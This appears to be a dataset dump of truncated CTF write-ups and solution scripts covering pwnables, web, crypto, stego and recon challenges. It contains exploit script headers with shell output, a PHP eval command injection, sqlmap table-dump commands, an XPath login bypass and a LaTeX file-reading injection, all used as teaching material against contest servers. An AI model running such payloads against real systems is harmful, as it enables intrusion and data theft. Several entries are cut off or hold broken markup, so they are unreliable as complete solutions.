text_chunk
stringlengths
151
703k
Hack.lu 2012 Zombie-lockbox (200) Writeup by cutz ctf@zombie_lockbox:~$ file zombie-lockboxzombie-lockbox: setuid setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x85b329ae9ddc0039a4a3a7a0d42ed1098eda09c1, not stripped zombie-lo...
<div id="form"><form method="POST" style=" width:900px; margin:auto;"><label for="name">Name<input type="text" id="name" name ="name"></label><label for="text">Text<textarea name="text" id="text"></textarea></label><label for="solution">Spam protection: 9-system('cat /6f170bcecda1ca8d3a5435591202988881b34bad')-9<input...
Hack.lu 2012 Braincpy (300) Writeup by cutzctf@braincpy:~$ file braincpybraincpy: setuid setgid ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.9, not stripped Braincpy was an ELF, according to file 32 bits and statically linked. ctf@braincpy:~$ file braincpybraincpy:...
#!/bin/python # exploit write up - pwnables 200 Defcon 20 CTF# by @_g05u_ NULL Life FTW! import socket, struct #jump to shellcode in stackret = struct.pack("
Misc 200 Task:There are rumors that Lamevich could be a spy.. Check it please, maybe you could find something in the "Very Brown Square"...I used Stegsolv.Open the file "square.gif".Click "<" button twice.So, the flag can be seen.So easy, isn't it?41306ef63420760771deff1a0db76888
Fire up gdb and start snooping around in the binary. To our luck, the ELF still has debugging symbols, so all of the function calls have obvious names.
23 - Spambot The zombies are planning an invasion. But before they can start they want to scare the people by sending scary messages. Because zombies are not able to write letters they've developed a platform which automatically submits messages to guestbooks or comment platforms. A careless zombie lost his note about ...
I reverse engineered the binary to find the encoding function, converted it to Python, and verified correctness. I then wasted a bunch of time making an iterative bruteforcer, until I realized that the encoding function is basically equivalent to: bits('RTFM') + tab[buf[0]] + '00' + tab[buf[1]] + '00' + ... + tab[b...
We were ready to deobfuscate JavaScript, but there wasn't need to do it.We just opened the link in Firefox with Firebug enabled. In the <body> element we saw:<div id="a" data-a="function dafug(){if (prompt("Lets eat some ...?")=="tasty brainz")alert("Flag: tasty_humans_all_day_erry_day"); };"></div>So, we got this flag...
#!/usr/bin/perl# codegate2013 vuln400 exploit# cutz## $ (perl expl_vuln400.pl;cat) | nc 58.229.122.20 6666# _______________________________ # /==============================/ # | Onetime Board Console | # /------------------------------/ # | | WELCOME | | # |__________|_________|_________| # |...
There was no clear goal given in the challenge description text (as guessing was the key skill needed in this CTF), so we decided to just poke around on the website. We immediately got an error message urging us to use a mobile browser. Given the clear affinity of the CTF hosts twoards iPhones, we just changed our User...
\documentclass{article} \begingroup\makeatletter\endlinechar=\m@ne\everyeof{\noexpand}\edef\x{\endgroup\def\noexpand\TeXpath{\@@input"/home/awesker/cure" }}\x \begin{document} {\catcode`_=12 \ttfamily@@\input{|"ls /home/awesker/" } } \TeX{} is \TeXpath\end{document}
# codegate2013 bin100 solution# cutzusing System;using System.Text;using System.Security.Cryptography;namespace test{ class Program { public static string KeyValue = "9e2ea73295c7201c5ccd044477228527"; public static byte[] d = new byte[] { 0x3f, 30, 0x39, 0x2f, 20, 0x4e, 50, 0x36, 0x33, 5, 0x25, 0x29, 0x52, 40,...
<span>In The Name Of GOD;)hi my bro's;)It is very easy</span>:Dq parameters is injectable:Duse sqlmap for inject:D<< sqlmap.py -u http://backdoor-problems.cognizance.org.in/web200/submit.php --data q=a -p q --threads 10 --tables >>dump tables:Dflagsusersdump flags table with command:<< sqlmap.py -u http://backdoor-prob...
Dethstarr was one of my favorite service exploitation challenges during the SecuInside 2012 contest. We had to fully reverse a given binary to understand how the protocol it implements works. To be able to debug the binary easily and in the same environment as on the remote server...
#!/usr/bin/perl# codegate2013 vuln200 exploit# cutz# # perl expl_vuln200.pl 58.229.122.19 7777# [x] exploit successfull# $ id# uid=1001(codegate2013) gid=1001(codegate2013) groups=1001(codegate2013)# $ ls# dump.txt# key# logs# pwn2# $ cat key# Key is "This_is_C0G6ESTYL3!_:)"use strict;use warnings;use IO::Socket;$|++;m...
package main import "crypto/aes"import "fmt"import "encoding/hex" var start = []byte("AES-256 ECB mode twice, two keys")var end = []byte("\x4c\x76\xe9\x07\x86\xc4\xf3\x64\x6a\xdf\x99\x21\x7a\x64\xd0\xd7\x49\xed\xc5\x9f\x2c\x7f\xbb\x36\x58\xaf\x04\xaf\x07\x1d\x0c\x47") var reverse = make(map[string][32]byte) func main()...
~~~THE TASK~~~ Zombies got communication-problems because of their heterogeneity, so they defined a standard for their communication. We need to know how to decrypt their messages in order to successfully defeat them. Luckily, a friend of mine found one of those encrypted messages: 0x1be15dc 77676058612 03062372 676 0...
#!/usr/bin/python from z3 import * data = [ord(c) for c in "".join(["\x00\x3F\x60\xFF\x7F\x5F\xFF\x5F\x7F\xFF\x7E\x5E\xFF\x7E\x7F\x7F","\x5E\x7E\xFF\x7D\x5D\xFF\x7D\x7E\x7E\x5D\x7D\xFF\x7C\x5C\xFF\x7C","\x7D\x7D\x5C\x7C\xFF\x7B\x5B\xFF\x7B\x7C\x7C\x5B\x7B\xFF\x7A\x5A","\xFF\x7A\x7B\x7B\x5A\x7A\xFF\x79\x59\xFF\x79\x7A\x...
#!/usr/bin/env python2## see: https://github.com/fx5/not_random and related article import sysimport osimport gzipimport randomfrom itertools import imapimport hashlib from lxml.etree import parse from progress import ProgressBar #HOST = 'example.com'HOST = 'ctf.phdays.com:12391'USERN = int(sys.argv[1])EMAIL = 'user%[e...
In The Name Of GOD;)hi my bro's;)<span>It is very easyDifference is that the web 150 is just the type of inject;)blind</span> injection:Puse sqlmap for inject:)<< sqlmap.py -u http://backdoor-problems.cognizance.org.in/web500/submit.php --data id=1 -p id --threads 10 --sql-query="select password from users where name='...
The trick here was to spot the vulnerability. The scripts loads html from a controlled webpage with @file_get_contents(). It then parses the html for forms with regex to solves a basic math problem, with unescaped eval(). Finally the page submits a post request to the controlled webpage with file_get_contents().
# Rookie Agent ## The Given We have intercepted this encrypted message. Since the agent who has sent it, is not a pro, we believe decrypting it would be easy. Good luck! 6di16 ovhtm nzsls xqcjo 8fkdm tyrbn g4bg9 pwu9g lefmr k4bg9 ahmfm tyr4b g9htm 7ejcn zsbng 492cj olsxq 9glef mrk4b g9ahm fmtyr lsxq7 ejccj...
# Cryptor ## The GivenWe have found the cryptor source code. Decrypt the file. ```c++#include <stdio.h>#include <stdlib.h>#include <string.h>#include <time.h> using namespace std;int bitXor(int, int); int main(int argc, char **argv){ srand(time(NULL)); char *path=new char[30]; if(argc > 1) path = argv[1...
# Windows ## The GivenAppend what you find to "ASIS\_" and send that as flag. An [mp4 video](windows_assets/windows.mp4) is attached. It's a video of smallpictures of windows flashing across the screen with a strange soundtrack. ![Example Frame](windows_assets/windows.png) ## AnalysisLet's start with the audio. Pull ou...
# PCap ## Given We're given a pcap file. [The pcap file](pcap.pcap). ## Observations There were two ip addresses communicating with each other: * 172.16.133.133* 172.16.133.149 ## TCP Conversations There was some substantial cover traffic, but in the end, we identifiedjust three categories of communication that were re...
#include <stdlib.h>#include <stdio.h>#include <limits.h> unsigned int outputs[7][4] = { {0x7358837a, 0x6e1b2658, 0x3c00c5ff, 0x8c0d4aa}, {0x34d8c3b5, 0x5b56dca1, 0x78236d7, 0x1973085e}, {0x1f49456c, 0x27c0fa1d, 0x145214aa, 0x6200299c}, {0x1fea6614, 0x41cdb864, 0x53c0ed56, 0x63642916}, {0x4e81abc7, 0x792ce075, 0x7d2bc...
In this task we are given anInnoSteup file, setup.exe. The setup.exe contained a long eula, and a passwordrequirement to install the program. Bypassing the password could be done withollydbg or just a simple innosetup unpacker. Unpacking the setup we see a C programwhich prints to screen that we already saw the flag. W...
This is a reference to DEFCON 2006’s trivia question whichused EBFE is to x86 as ____ is to PowerPC. This time we have to find the ARM64equivalent.<span>A quickgoogle search tells us that EBFE is a jmp instruction, but ARM does not havesuch instruction, they use branches instead, b is our instruction. Looking inthe ARM...
<span>Flag is out there: http://[2a02:6b8:0:141f:fea9:d5ff:fed5:XX01]/</span>Flag format: CTF{..32 hexes..} <span>So we know we are given an IPv6 address missing two characters, hence XX. Thankfullywe can search for the address in an ipv6 database which tells us that there isa website with an ipv6 address of http://[2a...
---- Writeup ----CTF: BACKDOOR 2014Problem: binary-10Author: Dr.OptixAll rights reserved.-----------------I will start with basic recon.$ file bin10 bin10: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=e0f10986e9a0fc976ff2be10b411f368bfd5...
---- Writeup ----CTF: BACKDOOR 2014Problem: web-50Author: Dr.OptixAll rights reserved.NOTE: Another solution proof made directly from the notes I took while solving-----------------This problem starts at:http://backdoor.cognizance.org.in/problems/web50/search.phpAt the first look it seems to be a SQL injection problem....
First Many Time Pad then Caesar cipherFor checking your solutions:Keystream8cbceac3c9359047eafb6eca7503e26bd603a435c762f975ce3be5ba678c58ed<span>2fb4f9ff61ec46537c71f13046df1180a784d005d358f69fa9842443df1c4c4173d175973c5d07970a1ead0c6de587c38b5be127775bfa2f4c4cb42652975829fb499973256cfa29937458514cf2f553d7b947b9f15d282...
<span>Google "Elton Badget", first result is LinkedIn: http://ru.linkedin.com/pub/elton-badget/93/aa/42Read the initials of his "also knows about" section: Firewalls, Logistics Management, Apache, Graphic Design, IT Management, Servers, Database Design, IT Outsourcing, Computer Security, Technical Writing, ISO, 0-in, N...
First visit his Facebook page, he has this comment: "<span>Do u know about twitch.tv? Sometimes streaming there, look at me!"The about page writes: "</span>Screen Name: pipissimo (Other Service)"So you can find his twitch profile: http://www.twitch.tv/pipissimoIn one of his previous videos (the only one with a comment)...
Question: Hack the Planet_The answer to this is “!”. It is based off of a running gag from DEFCON where eachyear they use the same question, but blank out a different character/word. If you didn't know this you could just google the phrase "Hack the Planet".
# Plaid CTF 2014: mtpox **Category:** Web**Points:** 150**Description:** > The Plague has traveled back in time to create a cryptocurrency before Satoshi does in an attempt to quickly gain the resources required for his empire. As you step out of your time machine, you learn [his exchange](http://54.211.6.40/) has stop...
# Plaid CTF 2014: WhatsCat **Category:** Web**Points:** 300**Description:** > The Plague is using his tremendous talent for web applications to build social websites that will get bought out for billions of dollars. If you can stop his climb to power now by showing how insecure [this site really is](http://54.196.116.7...
# Plaid CTF 2014: halphow2js **Category:** Web**Points:** 200**Description:** > Javascript is everywhere. But there is [one strange javascript blob](https://54.196.246.17:8001/) we have been seeing pop up on servers throughout the ages. We're pretty sure The Plague must be involved.>> Note: we know the cert displays a ...
# Olympic CTF 2014: Just No One **Category:** Binathlon (Bin)**Points:** 10**Author:** vos**Description:** > Here’s your binary: [`setup.exe`](setup.exe) ## Write-up The provided `setup.exe` file is a standard installation wizard. ![](setup-1.png) As usual with these wizards, the second screen contains a very long lice...
# Olympic CTF 2014: Make similar **Category:** Freestyle (Misc.)**Points:** 400**Author:** psb**Description:** > [Listen](similar.ogg) carefully and try to figure out. Hint: 120 LPM>> _Flag format: `CTF{..32 hexes..}`_ ## Write-up The “120 LPM” hint refers to [weather fax](http://en.wikipedia.org/wiki/Radiofax), an ana...
# Olympic CTF 2014: Trivial **Category:** Freestyle (Misc.)**Points:** 10**Author:** vos**Description:** > Hack the Planet\_ ## Write-up At DEF CON CTF there’s a running gag where each year they have a challenge where the only description is “Hack the Planet!” with one character or word blanked out. This is the same th...
# Plaid CTF 2014: multiplication is hard **Category:** Misc**Points:** 10**Description:** > The Plague went back in time... but we haven't yet figured out what he did this time... Anyway, what is 38.55 * 1700? ## Write-up Mathematically, `38.55 * 1700 = 65535` but that solution was not accepted. Years ago (“back in tim...
# Plaid CTF 2014: g++ **Category:** Reversing**Points:** 200**Description:** > Although it seems like The Plague's projects are open source, it's not quite so simple to figure out what the source code does. We believe [this project](g++-30f6a74ce24ea3605ba7cbec92222a72.tar.bz2) is supposed to print out secret informati...
plaidctf forensic 400 - quick writeup - by alanh0 @ VXRL1. use tools like "USF Explorer Pro" to recover "disk"2. firstly you find one file "not_the_key", well it's not key, dig deeper.3. use the tool "USF Explorer Pro" to recover the "disk" file, there's a folder containing "key.xor_encrypted" and "xor_key"4. by self-e...
---- Writeup ----CTF: VOLGACTF QUALS 2014Problem: web-200Author: Dr.OptixAll rights reserved.NOTE: Raw notes. Also I plaid as Team Guest as I could not register my one man army team in time.-----------------The problem starts here:http://tasks.2014.volgactf.ru:28102/Doing basic recon I found that I can create any accou...
<span>  1. [00:05] Breaking Bad - s05e07</span><span>  2. [01:05] Prison Break - s02e03</span><span>  3. [01:58] Walking Dead - s03e03</span>  4. [xx:xx] Sherlock - s03e01<span>  5. [03:38] Smallville  s06e17  http://smallville.wikia.com/wiki/Titan</span>  6. [xx:xx] Game of Thrones - s01e07<span>  7. [05:20] How I Met...
You are given a string very likely that it's base64 of some data (its length is divisible by 4 and last character is '=' sign). So:$ base64 --decode > fileQlpoOTFBWSZTWTxSmOAAAAsJAF/gOwAgADEAAAiZMNT0JbKzhCQcyQtA2gNbvXgSvxdyRThQkDxS<span>mOA=$ cat fileBZh91AY..(binary file)Google BZh91AY, find bz2$ bzip2 -d filebzip2: C...
This challenge was fairly simple, although the binary changed 3 times.when one runs the file , it just outputs Baby Crackme in an infinite loop.<span>by opening the file with gdb and examining the beginning of main(), one sees :Dump of assembler code for function main:   0x08048454 <+0>:    push   ebp   0x08048455 <+1>...
For this challenge, we were given with a sound.wav file.We opened the file with Audacity as usually, and we thought that it was a morse code, later we found that it was spectrogram.So we just used spectrogram option in audacity and it reveals the flag :)flag: e5353bb7b57578bd4da1c898a8e2d767
After looking at files it was obvious that problem depends on solving sudoku in sudoku.png.First an online sudoku solver like: http://www.sudoku-solutions.com/The name of file "row-major-order" tell us that we must change order of pieces of image relate to solved sudoku.Doing this process with hand was frustrating so u...
# ASIS Cyber Security Contest Finals 2014: Natural algorithm **Category:** Stego, Recon**Points:** 150**Description:** > Find flag in the [image](sunflower_2b870888a7b24ca81ff00529550ecd5f). ## Write-up Let’s see what [the provided file](sunflower_2b870888a7b24ca81ff00529550ecd5f) could be: ```bash$ file sunflower_2b87...
# ASIS Cyber Security Contest Finals 2014: Capsule **Category:** Forensics**Points:** 125**Description:** > Find the flag in this [file](capsule_239acad5fcfe4722e624da66c9c02542). ## Write-up Let’s see what [the provided file](capsule_239acad5fcfe4722e624da66c9c02542) could be: ```bash$ file capsule_239acad5fcfe4722e62...
# ASIS Cyber Security Contest Finals 2014: XORQR **Category:** PPC**Points:** 150**Description:** > Connect here and find the flag:>> ```bash> nc asis-ctf.ir 12431> ``` ## Write-up _This write-up is made by Steven of the [HacknamStyle](http://hacknamstyle.net/) CTF team._ This challenge sends, after you send "START", a...
We got a C source code. If we look carefully at it we will notice that some lines are indented with tabs while others are indented with spaces.The solution is just to comment or delete the lines indented with tabs and execute the code to get the flag.Flag: D0nT_e4t_Sushi
# ASIS Cyber Security Contest Finals 2014: Fact or Real? **Category:** Recon**Points:** 25**Description:** > `ASIS_md5(motto)` ## Write-up _factoreal_ is one of the organizers of this CTF. On [his Twitter account](https://twitter.com/factoreal) we find [a tweet with the text “fact or real:” followed by an image that sa...
# Plaid CTF 2014: Heartbleed **Category:** Misc**Points:** 10**Description:** > Our hearts are bleeding. But instead of bleeding password bytes, they're bleeding flags. Please recover our flags so we don't bleed to death before we can update to 1.0.1-g. Site is up at <https://54.82.147.138:45373/>.>> (The flag format i...
# ASIS Cyber Security Contest Finals 2014: Lottery **Category:** Web**Points:** 100**Description:** > Go here:>> <http://asis-ctf.ir:12437/> ## Write-up The web site says: > The 1234567890th visitor, the prize awarded.> Anyone who has visited our site is the 1234567890th Special prizes are awarded.> You are the 717 vis...
You were given some images, they were actually punch-cards, and had to get the key from them.Write-up is at https://0x44696f21.wordpress.com/ .0x44696f21
#!/bin/sh#for pctf2014 gcc problem helloksudo tee /usr/lib/ssl/openssl.cnf > /dev/null <<'EOF'## OpenSSL example configuration file.# This is mostly being used for generation of certificate requests.# # This definition stops the following lines choking if HOME isn't# defined.HOME = .RANDFILE = $ENV::HOME/.rnd # Extr...
## Mattapan - Pwning 150 Problem - Writeup by Robert Xiao (@nneonneo) The flag to Park Street was `OFPFC_ADD`, which could be found by some quick Googling and finding the OpenFlow specification document. (This flag was necessary to talk to the server). In Mattapan, you get the chance to configure an OpenFlow switch whi...
## Alewife - Pwning 400 Problem - Writeup by Robert Xiao (@nneonneo) This problem took a little while to reverse. Basically, it implements a variety of array operations on three kinds of arrays: `string` arrays, `int` arrays and `mixed` arrays (arrays whose elements can be either `string` or `int`). 32 instances of eac...
## Airport - Crypto 500 Problem - Writeup by Robert Xiao (@nneonneo) The hint for the problem says > The timing in this challenge is clearly not very realistic---but the methods you'll use here can be extended to real-world implementations of modular exponentiation. Opening up the package, we see that they have impleme...
# CodeGate General CTF 2015: Systemshock **Category:** Pwnable**Points:** 200**Description:** >Login : ssh [email protected] >Password : systemshocked ## Write-up Logging in via SSH puts us in a directory with two files of interest, the flag (which can be read by user systemshock-solved) and a binary called shock wh...
SECCON_2014_Programming100========================== write-up of programming 100 challenge at SECCON 2014 ![alt tag](https://lh4.googleusercontent.com/-BKeVALTKu6Y/VIgZf0aIQwI/AAAAAAAAAHo/YFBXUvbesLU/w702-h527-no/Screenshot%2Bfrom%2B2014-12-06%2B19%3A54%3A11.png)
# BCTF 2015: weak_enc **Category:** Crypto**Points:** 200**Description:** > nc 146.148.79.13 8888> > [http://dl.bctf.cn/weak_enc-40eb1171f07d8ebb06bbf36849d829a1.py.xz](challenge/weak_enc.py)> > Decrypt: NxQ1NDMYcDcw53gVHzI7> > The flag for this problem does not look like BCTF{xxxxxx} ## Write-up The challenge consist...
# Backdoor CTF 2015: Team **Category:** Pwnable**Points:** 600**Description:** > There is a wierd kind of authentication service running: nc hack.bckdr.in 8004.> > The binary can be found [here](challenge/team).> The vampire says that there is no need for bruteforce. ## Write-up We first check the binary: >```bash>fil...
Little Suzie started learning C. She createda simple program that echo’s backwhatever you input. Here is the binary file.The vampire came across this service onthe internet. nc hack.bckdr.in 8002.Reports say he found a flag. See if you canget it.
# Backdoor CTF 2015: Echo **Category:** Pwnable**Points:** 100**Description:** > Little Suzie started learning C. She created a simple program that echo's back whatever you input. > [Here](challenge/echo) is the binary file. > The vampire came across this service on the internet. nc hack.bckdr.in 8002. Reports say he ...
There is a wierd kind of authenticationservice running: nc hack.bckdr.in 8004.The binary can be found here. The vampiresays that there is no need for bruteforce.
# Nuit Du Hack CTF 2015: Game Of Life **Category:** Crypto**Points:** 150**Description:** >"We're born alone, we live alone, we die alone. Only through our love and friendship can we create the illusion for the moment that we're not alone." (Orson Orwell)>>[Cells cells cells, the basis of life](challenge/GOL.tar.gz). ...
# Backdoor CTF 2015: Rsanne **Category:** Crypto**Points:** 350**Description:** > The flag is encrypted using a system that makes use of prime factorization of large numbers.> > Decrypt the flag from [this](challenge/RSANNE.tar.gz). > > If you pwned RSALOT, you should have a fun time solving this one. ## Write-up The ...
# Plaid CTF 2015: Strength **Category:** Crypto**Points:** 110**Description:** >Strength in Difference>>We've [captured](challenge/captured) the flag encrypted several times... do you think you can recover it? ## Write-up The challenge consists of a file containing a collection of tuples: >{N : e : c}>{0xa5f7f8aaa8292...
# Plaid CTF 2015: EBP **Category:** EBP**Points:** 160**Description:** >Pwnable (160 pts)>nc 52.6.64.173 4545 >>Download: [%p%o%o%p](challenge/ebp.elf). ## Write-up We start by first checking the binary: >```bash>$ file ebp>ebp: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared ...
Fawkes has been playing around withFinite State Automaton lately. Whileexploring the concept of implementingregular expressions using FSA he thoughtof implementing an email-addressvalidator.Recently, Lua started to annoy Fawkes. Tothis, Fawkes, challenged Lua to a battle ofwits. Fawkes promised to reward Lua, onlyif sh...
# REG EX ## Writeup This is a writeup of the reversing challenge 'REG EX' from PlaidCTF 2015. The challenge provided two files: a python server program and a crazy-huge regex (see `regex.txt`). The python server is very basic: it simply listens for a connection, prompts for a 'key', and then checks whether the key matc...
# ASIS Cyber Security Contest Finals 2014: Echo **Category:** PPC**Points:** 200**Description:** > Connect there:>> ```bash> nc asis-ctf.ir 12433> ``` ## Write-up Let’s connect to the service: ```bash$ nc asis-ctf.ir 12433Go Ahead and find flag :D``` The service seems to just echo whatever we send it: ```bash$ nc asis-...
## Wonderland - Crypto 600 Problem - Writeup by Robert Xiao (@nneonneo) Wonderland was quite a tough problem. Opening up the package, we see that the server implements some kind of elliptic curve scheme. We found that the curve was given in Montgomery curve form, and checked that the arithmetic was all correct (also ve...
# Teaser CONFidence CTF 2015: Apache Underwear ----------## Challenge details| Contest | Challenge | Category | Points ||:---------------|:--------------|:----------|-------:|| Teaser CONFidence CTF 2015 | Apache Underwear | Web | 400 | **Description:**>*Pwn [this server](http://134.213.136.187:8080/). K...
# VolgaCTF Quals 2015: Rsa ----------## Challenge details| Contest | Challenge | Category | Points ||:---------------|:--------------|:----------|-------:|| VolgaCTF Quals 2015 | Rsa | Crypto | 200 | **Description:**>*rsa* >*The oldie but goodie.* >*[script](challenge/decryptor.py)* >*[key](challenge/key...
## Kendall - Pwning 300 Problem - Writeup by Robert Xiao (@nneonneo) Kendall was "interesting". There were some red herrings that set us on the wrong path for quite some time. Taking apart the binary, a few things stand out. First, there's a fairly obvious exploit that allows you to become an authenticated user, by abu...
# VolgaCTF 2015: Web2 **Category:** Web**Points:** 200**Description:** > Find the key!> http://web2.2015.volgactf.ru/> > Hints> > 1. Find the logs! ## Write-up We're presented with a rather empty-looking website called 'HackBlog'. No further links to other pages and the html-source doesn't provide any clues. Let's try...
# VolgaCTF 2015: database **Category:** Pwn**Points:** 75**Description:** > *hack the [database](challenge/database)!*>> *nc database.2015.volgactf.ru 7777* Its a telnet-service listening on port 7777 In the non-stripped binary we see a couple of functions, when looking at the functionprocess_connection we see a few p...
This was a case of injecting a field of a vulnerable web application. It's not mysql though, it is XPATH.One can log-in as admin by entering Username: ' or '1' = '1Password:  ' or '1' = '1and then on the search user id field : ' or '1' = '1This returns a bunch of results, including the flag : Pwnium{cf921420dfd44ae4a6...
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch...
# ASIS Cyber Security Contest Finals 2014: Mask **Category:** Crypto, Stego**Points:** 150**Description:** > Flag is hidden in [file](mask_e50b38fc9ba38378c444bd93518e886f), find it!>> **Hint:** Numerical representation can be useful. ## Write-up Let’s see what [the provided file](mask_e50b38fc9ba38378c444bd93518e886f)...
# Plaid CTF 2014: curlcore **Category:** Forensics**Points:** 250**Description:** > We managed to grab a [memory dump](curlcore-b9b2bc016a796db9db66be6365d48a6b.tar.bz2) off of The Plague’s computer while he was making a secure download. We think he may have been looking for new places to hide the Prime Factorizer. Can...
# VolgaCTF Quals 2015: Russian doll ----------## Challenge details| Contest | Challenge | Category | Points ||:---------------|:--------------|:----------|-------:|| VolgaCTF Quals 2015 | Russian doll | Forensics | 300 | **Description:**>*Russian doll* >*We got a strange file, can you find a flag in it i...
# CodeGate General CTF 2015: Owltube **Category:** Web**Points:** 400**Description:** > You're welcome to betatest our new social media site, it's going to be the next big thing.> > Server : http://54.64.164.100:5555/> Script : [index.py](challenge/index.py)> > - option : please check the notice board. ## Write-up The...
# Backdoor CTF 2015: Rsalot **Category:** Crypto**Points:** 250**Description:** > The flag is encrypted using a system that makes use of prime factorization of large numbers. >> Decrypt the flag from [this](challenge/RSALOT.tar.gz). ## Write-up The challenge consists of a collection of 100 RSA public keys and an RSA-e...
# ASIS CTF Quals 2015: leach ----------## Challenge details| Contest | Challenge | Category | Points ||:---------------|:--------------|:----------|-------:|| ASIS CTF Quals 2015 | leach | Reversing | 250 | **Description:**>*Find the flag in this [file](challenge/leach).* ----------## Write-up Let's take...
# ASIS Quals CTF 2015: Angler **Category:** Crypto**Points:** 150**Solves:** 22**Description:** > Connect there and find the flag.> > nc 217.218.48.84 34211> > mirror 1 : nc 217.218.48.84 34213> > mirror 2 : nc 217.218.48.84 34215> > mirror 3 : nc 217.218.48.84 34210 ## Write-up by [DerBaer0](https://github.com/DerBaer...
from the simulator, "9930-nv.dmp" is the file we want to look into, but where is the password?1. in order to find the location of the password, let's set one on our own first, open simulator, do factory reset, so we can set our password2. set screen lock password --> "password", generate SHA1 hash, which is "5baa61e4c9...
# ASIS CTF Quals 2015: selfie ----------## Challenge details| Contest | Challenge | Category | Points ||:---------------|:--------------|:----------|-------:|| ASIS CTF Quals 2015 | selfie | Reversing | 150 | **Description:**>*Find the flag in this [file](challenge/selfie).* ----------## Write-up See wha...
# Nuit Du Hack CTF 2015: Crackme Prime **Category:** Reversing**Points:** 150**Description:** > "I am Optimus Prime, and I send this message to any surviving Autobots taking refuge among the stars. We are here, we are waiting.">> [Keygen me](challenge/prime.tar.gz), I'm the Prime.> > Validate your serial here : http:/...
after few static analysis i found that we can get back the original data by running the file "flag.enc" through the encryption process 3 times then you get the flag./dark flag.enc flag1.enc./dark flag1.enc flag2.enc./dark flag2.enc flag3.encflag3.enc -> PDF file#xor #easy_hunt
# Teaser CONFidence CTF 2015: Practical Numerology ----------## Challenge details| Contest | Challenge | Category | Points ||:---------------|:--------------|:----------|-------:|| Teaser CONFidence CTF 2015 | Practical Numerology | Web | 300 | **Description:**>*Here's a [lotto script](challenge/index.ph...
# ASIS Quals CTF 2015: FalseCrypt **Category:** Crypto**Points:** 450**Solves:** 3**Description:** > Connect there: >> nc 217.218.48.84 12431 ## Write-up by [DerBaer0](https://github.com/DerBaer0) Ok, let's see what to do with the challange with the most points in this contest. It took me a long time to understand, how...
# DEF CON CTF Quals 2015: catwestern ----------## Challenge details| Contest | Challenge | Category | Points ||:---------------|:--------------|:----------|-------:|| DEF CON CTF Quals 2015 | catwestern | Coding | 1 | **Description:**>*meow catwestern_631d7907670909fc4df2defc13f2057c.quals.shallweplayaga...
# Plaid CTF 2014: kpop **Category:** Web**Points:** 200**Description:** > Sometimes, the Plague leaves some of his old stuff up and running. We found a [K-Pop lyrics website](http://54.234.123.205/) the Plague wrote back when he was learning to program. It was [open-source](kpop-686da11b170e7054ebee30a218d6490f.tar.bz2...